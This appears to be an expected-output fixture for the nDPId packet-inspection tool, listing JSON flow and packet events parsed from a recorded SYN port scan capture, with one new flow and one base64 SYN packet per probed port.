+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":885,"source":"synscan.pcap","alias":"nDPId-test","flow_id":876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"synscan.pcap","alias":"nDPId-test","flow_id":876,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAschMAACoGrF+sEAAIQA2GNIzSK2bdUoMYAAAAAGACDAABKQAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":886,"source":"synscan.pcap","alias":"nDPId-test","flow_id":877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"synscan.pcap","alias":"nDPId-test","flow_id":877,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAsnCkAADcGdUmsEAAIQA2GNIzSOprdUoMYAAAAAGACEADt9AAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"synscan.pcap","alias":"nDPId-test","flow_id":878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12345,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"synscan.pcap","alias":"nDPId-test","flow_id":878,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAspFoAADUGbxisEAAIQA2GNIzSMDndUoMYAAAAAGACCAAAVgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":888,"source":"synscan.pcap","alias":"nDPId-test","flow_id":879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":888,"source":"synscan.pcap","alias":"nDPId-test","flow_id":879,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAsF4AAADsG9fKsEAAIQA2GNIzSJvDdUoMYAAAAAGACEAABnwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":889,"source":"synscan.pcap","alias":"nDPId-test","flow_id":880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1974,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":889,"source":"synscan.pcap","alias":"nDPId-test","flow_id":880,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAsslAAADkGXSKsEAAIQA2GNIzSB7bdUoMYAAAAAGACCAAo2QAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":890,"source":"synscan.pcap","alias":"nDPId-test","flow_id":881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":890,"source":"synscan.pcap","alias":"nDPId-test","flow_id":881,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAsyZQAACwGUt6sEAAIQA2GNIzSJqzdUoMYAAAAAGACBAAN4wAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":891,"source":"synscan.pcap","alias":"nDPId-test","flow_id":882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1164,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"synscan.pcap","alias":"nDPId-test","flow_id":882,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsUYgAADkGveqsEAAIQA2GNIzSBIzdUoMYAAAAAGACCAAsAwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":892,"source":"synscan.pcap","alias":"nDPId-test","flow_id":883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":892,"source":"synscan.pcap","alias":"nDPId-test","flow_id":883,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsDTcAAC8GDDysEAAIQA2GNIzSA4LdUoMYAAAAAGACEAAlDQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":893,"source":"synscan.pcap","alias":"nDPId-test","flow_id":884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6881,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":893,"source":"synscan.pcap","alias":"nDPId-test","flow_id":884,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsiQgAACkGlmqsEAAIQA2GNIzSGuHdUoMYAAAAAGACCAAVrgAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":894,"source":"synscan.pcap","alias":"nDPId-test","flow_id":885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"synscan.pcap","alias":"nDPId-test","flow_id":885,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsouUAADgGbY2sEAAIQA2GNIzShwvdUoMYAAAAAGACBACtgwAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":895,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAs0KgAACYGUcqsEAAIQA2GNIzSAfTdUoMYAAAAAGACDAAqmwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":896,"source":"synscan.pcap","alias":"nDPId-test","flow_id":887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":896,"source":"synscan.pcap","alias":"nDPId-test","flow_id":887,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsyxIAADkGRGCsEAAIQA2GNIzSFADdUoMYAAAAAGACCAAcjwAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":897,"source":"synscan.pcap","alias":"nDPId-test","flow_id":888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"synscan.pcap","alias":"nDPId-test","flow_id":888,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAslCcAADIGgkusEAAIQA2GNIzSRnjdUoMYAAAAAGACDADmFgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":898,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAs1vIAADkGOICsEAAIQA2GNIzSE8TdUoMYAAAAAGACCAAcywAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":899,"source":"synscan.pcap","alias":"nDPId-test","flow_id":890,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3659,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":899,"source":"synscan.pcap","alias":"nDPId-test","flow_id":890,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsmf0AACUGiXWsEAAIQA2GNIzSDkvdUoMYAAAAAGACCAAiRAAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":900,"source":"synscan.pcap","alias":"nDPId-test","flow_id":891,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1051,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":900,"source":"synscan.pcap","alias":"nDPId-test","flow_id":891,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAss\/0AACsGaXWsEAAIQA2GNIzSBBvdUoMYAAAAAGACEAAkdAAAAgQFtA=="} +00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":901,"source":"synscan.pcap","alias":"nDPId-test","flow_id":892,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":545,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":901,"source":"synscan.pcap","alias":"nDPId-test","flow_id":892,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsz\/oAACoGTnisEAAIQA2GNIzSAiHdUoMYAAAAAGACDAAqbgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":902,"source":"synscan.pcap","alias":"nDPId-test","flow_id":893,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2004,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":902,"source":"synscan.pcap","alias":"nDPId-test","flow_id":893,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsPSIAACsG4FCsEAAIQA2GNIzSB9TdUoMYAAAAAGACEAAguwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":903,"source":"synscan.pcap","alias":"nDPId-test","flow_id":894,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":903,"source":"synscan.pcap","alias":"nDPId-test","flow_id":894,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAshZcAADUGjdusEAAIQA2GNIzSA+rdUoMYAAAAAGACCAAspQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":904,"source":"synscan.pcap","alias":"nDPId-test","flow_id":895,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2601,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":904,"source":"synscan.pcap","alias":"nDPId-test","flow_id":895,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAs2oIAADoGM\/CsEAAIQA2GNIzSCindUoMYAAAAAGACDAAiZgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":905,"source":"synscan.pcap","alias":"nDPId-test","flow_id":896,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1093,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":905,"source":"synscan.pcap","alias":"nDPId-test","flow_id":896,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsy1EAACUGWCGsEAAIQA2GNIzSBEXdUoMYAAAAAGACCAAsSgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":906,"source":"synscan.pcap","alias":"nDPId-test","flow_id":897,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5989,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":906,"source":"synscan.pcap","alias":"nDPId-test","flow_id":897,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsgekAADsGi4msEAAIQA2GNIzSF2XdUoMYAAAAAGACEAARKgAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":907,"source":"synscan.pcap","alias":"nDPId-test","flow_id":898,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059852,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059852,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4550,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":907,"source":"synscan.pcap","alias":"nDPId-test","flow_id":898,"flow_packet_id":1,"flow_last_seen":1278275059852,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059852,"pkt":"ACYLMQczACWzv5HuCABFAAAsXasAADMGt8esEAAIQA2GNIzSEcbdUoMYAAAAAGACEAAWyQAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":908,"source":"synscan.pcap","alias":"nDPId-test","flow_id":899,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":7937,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":908,"source":"synscan.pcap","alias":"nDPId-test","flow_id":899,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsAAgAADkGD2usEAAIQA2GNIzTHwHdU4MZAAAAAGACCAARiwAAAgQFtA=="} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":909,"source":"synscan.pcap","alias":"nDPId-test","flow_id":900,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059895,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059895,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":1914,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":909,"source":"synscan.pcap","alias":"nDPId-test","flow_id":900,"flow_packet_id":1,"flow_last_seen":1278275059895,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059895,"pkt":"ACYLMQczACWzv5HuCABFAAAsN1QAACcG6h6sEAAIQA2GNIzTB3rdU4MZAAAAAGACEAAhEgAAAgQFtA=="} 